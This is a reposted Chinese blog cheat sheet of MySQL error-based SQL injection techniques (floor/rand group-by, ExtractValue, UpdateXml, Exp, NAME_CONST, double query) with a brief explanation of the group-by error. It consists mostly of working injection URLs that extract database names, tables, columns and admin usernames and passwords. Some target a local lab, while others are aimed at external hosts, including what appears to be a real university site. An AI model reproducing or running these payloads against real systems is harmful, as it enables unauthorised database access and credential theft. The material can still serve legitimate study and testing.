• MySQL报错注入总结


    mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。

    报错注入:(and后不能直接跟select,可以加())

    1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1
    2.报错注入extractvalue---->select extractvalue(1,concat(0x5c,([payload])))
    3.报错注入updatexml---->select 1=(updatexml(1,concat(0x3a,([payload])),1))
    4.报错注入Exp---->select Exp(~(select * from ([payload])a))

    1、通过floor暴错


    /数据库版本/

    http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select version()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+


    /简单办法暴库/
    http://www.waitalone.cn/sql.php?id=info()


    /连接用户/
    http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)


    /连接数据库/
    http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+


    /暴库/
    http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)


    /暴表/
    http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)


    /暴字段/
    http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)


    /暴内容/
    http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
    ---------------------

    2、ExtractValue(有长度限制,最长32位)


    http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
    http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

    3、UpdateXml(有长度限制,最长32位)


    http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) 
    http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

    4、NAME_CONST(适用于低版本)


    http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

    5、Error based Double Query Injection


    (http://www.vaibs.in/error-based-double-query-injection/)
    /数据库版本/
    http://www.waitalone.cn/sql.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

     Rand() //随机函数

     Floor() //取整函数

     Count() //聚合函数

     Group by key //分组语句

     

    备注原理:

    当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。[这个是Mysql的bug]。

    http://127.0.0.1/s/Less-5/?id=1′ and (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1#

    group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值不一致,导致插入时与原本已存在的产生冲突的错误

    转载:https://blog.csdn.net/jpygx123/article/details/84191704

  • 相关阅读:
    iframe设置背景透明
    苹果新版QuickTime X启用新图标
    css命名规则
    视觉设计前瞻实用性研究(PNVD) 第二期
    Tab(选项卡)的产品设计原则及应用 [1]
    WiFi热点认证
    自画表格,微软报表,水晶报表初用初分析.
    Winform 打印类重温
    Winform 打印DataGrid View
    Winform 常用的.记住免得以后到处找.
  • 原文地址:https://www.cnblogs.com/hack404/p/10836778.html
Copyright © 2020-2023  润新知